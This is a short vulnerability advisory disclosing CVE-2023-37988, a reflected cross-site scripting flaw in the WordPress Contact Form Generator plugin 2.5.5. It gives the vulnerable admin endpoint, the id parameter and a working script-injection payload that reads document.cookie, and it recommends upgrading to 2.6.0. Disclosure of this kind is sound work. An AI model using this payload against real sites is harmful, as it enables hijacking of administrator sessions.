Authored by Arvandy

WordPress Contact Form Generator plugin version 2.5.5 suffers from a cross site scripting vulnerability.

advisories | CVE-2023-37988

# Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting
# Date: 03-10-2023
# Exploit Author: Arvandy
# Software Link:
# Vendor Homepage:
# Version: 2.5.5
# Tested on: Windows, Linux
# CVE: CVE-2023-37988

# Product Description
Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref:

# Vulnerability overview:
The WordPress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.

# Proof of Concept:
Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=
Affected Parameters: id
XSS Payload: "><script>alert(document.cookie)</script>x

# Recommendation
Upgrade to version 2.6.0